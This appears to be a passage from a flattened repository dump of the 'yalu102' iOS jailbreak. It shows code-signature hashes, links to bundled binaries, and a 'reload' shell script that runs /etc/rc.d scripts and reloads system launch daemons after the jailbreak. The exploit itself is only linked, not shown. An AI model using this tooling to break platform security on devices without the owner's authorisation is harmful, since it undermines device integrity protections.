Base.lproj/Main.storyboardc/BYZ-38-t0r-view-8bC-Xf-vdC.nib 402 | 403 | hash 404 | 405 | dCTco81HlI53icsxkmpY4ma7uiE= 406 | 407 | hash2 408 | 409 | 9BNggQ7gY/UBxfzUTGhUvtbIIW9z/l+DxWuPz7NdCm8= 410 | 411 | optional 412 | 413 | 414 | Base.lproj/Main.storyboardc/Info.plist 415 | 416 | hash 417 | 418 | MDrKFvFWroTb0+KEbQShBcoBvo4= 419 | 420 | hash2 421 | 422 | 
PpvapAjR62rl6Ym4E6hkTgpKmBICxTaQXeUqcpHmmqQ= 423 | 424 | optional 425 | 426 | 427 | Base.lproj/Main.storyboardc/UIViewController-BYZ-38-t0r.nib 428 | 429 | hash 430 | 431 | MYNbw9VpODUPJW83AGF5PRM4cH0= 432 | 433 | hash2 434 | 435 | pRboj/M++wT6Q0BHstWKBN1Wb/y4Ll7MTFp25iqxQtE= 436 | 437 | optional 438 | 439 | 440 | bootstrap.tar 441 | 442 | hash 443 | 444 | M3F+Y2xXX53vUfHzcej+W4/JCzc= 445 | 446 | hash2 447 | 448 | F9nSjjlNosvA4GDvxwFWz7QQioKaXsROC8rtcIfX0bM= 449 | 450 | 451 | embedded.mobileprovision 452 | 453 | hash 454 | 455 | pQnMEgsSdbaNcrzCD399Rd8EtrM= 456 | 457 | hash2 458 | 459 | ZXZ7pKGNna8ZDaaY/b2+gUzLRrj9F1MEPSHQj2971/c= 460 | 461 | 462 | launchctl 463 | 464 | hash 465 | 466 | QvbrRKZyHftjDQ5QhNnC8Y0aTag= 467 | 468 | hash2 469 | 470 | jWDWROAa31bpZY7aYd/7GwdHxmPi6EMDjo5+0mzMLp0= 471 | 472 | 473 | reload 474 | 475 | hash 476 | 477 | nnTE9lXtABwAybaHACL97ObkK68= 478 | 479 | hash2 480 | 481 | UcqbxNvvoCWPrOIlKKICZLHLcbIvyl3VfZ4lnDAvXsY= 482 | 483 | 484 | tar 485 | 486 | hash 487 | 488 | xReGJgbRaSU/njYXXhu6JZ7kk1s= 489 | 490 | hash2 491 | 492 | /oMM16aBLvxAHzsOglPSnnWdDJOng/sEo7rGZDUmH88= 493 | 494 | 495 | 496 | rules 497 | 498 | ^ 499 | 500 | ^.*\.lproj/ 501 | 502 | optional 503 | 504 | weight 505 | 1000 506 | 507 | ^.*\.lproj/locversion.plist$ 508 | 509 | omit 510 | 511 | weight 512 | 1100 513 | 514 | ^version.plist$ 515 | 516 | 517 | rules2 518 | 519 | .*\.dSYM($|/) 520 | 521 | weight 522 | 11 523 | 524 | ^ 525 | 526 | weight 527 | 20 528 | 529 | ^(.*/)?\.DS_Store$ 530 | 531 | omit 532 | 533 | weight 534 | 2000 535 | 536 | ^(Frameworks|SharedFrameworks|PlugIns|Plug-ins|XPCServices|Helpers|MacOS|Library/(Automator|Spotlight|LoginItems))/ 537 | 538 | nested 539 | 540 | weight 541 | 10 542 | 543 | ^.* 544 | 545 | ^.*\.lproj/ 546 | 547 | optional 548 | 549 | weight 550 | 1000 551 | 552 | ^.*\.lproj/locversion.plist$ 553 | 554 | omit 555 | 556 | weight 557 | 1100 558 | 559 | ^Info\.plist$ 560 | 561 | omit 562 | 563 | weight 564 | 20 565 | 566 | ^PkgInfo$ 567 | 
568 | omit 569 | 570 | weight 571 | 20 572 | 573 | ^[^/]+$ 574 | 575 | nested 576 | 577 | weight 578 | 10 579 | 580 | ^embedded\.provisionprofile$ 581 | 582 | weight 583 | 20 584 | 585 | ^version\.plist$ 586 | 587 | weight 588 | 20 589 | 590 | 591 | 592 | 593 | -------------------------------------------------------------------------------- /yalu102.app/bootstrap.tar: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/bootstrap.tar -------------------------------------------------------------------------------- /yalu102.app/embedded.mobileprovision: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/embedded.mobileprovision -------------------------------------------------------------------------------- /yalu102.app/launchctl: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/launchctl -------------------------------------------------------------------------------- /yalu102.app/reload: -------------------------------------------------------------------------------- 1 | #!/bin/sh 2 | ls /etc/rc.d | while read a; do /etc/rc.d/$a; done 3 | sleep 1 4 | launchctl unload /System/Library/LaunchDaemons 5 | launchctl load /System/Library/LaunchDaemons/com.apple.logd.plist 6 | sleep 1 7 | launchctl load /Library/LaunchDaemons 8 | launchctl load /System/Library/LaunchDaemons 9 | 10 | exit 0 11 | -------------------------------------------------------------------------------- /yalu102.app/tar: -------------------------------------------------------------------------------- 
https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/tar -------------------------------------------------------------------------------- /yalu102.app/yalu102: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.app/yalu102 -------------------------------------------------------------------------------- /yalu102.ipa: -------------------------------------------------------------------------------- https://raw.githubusercontent.com/zhengmin1989/yalu102/3f43719e2261e22def94d89a1622e409e3c9f9ac/yalu102.ipa --------------------------------------------------------------------------------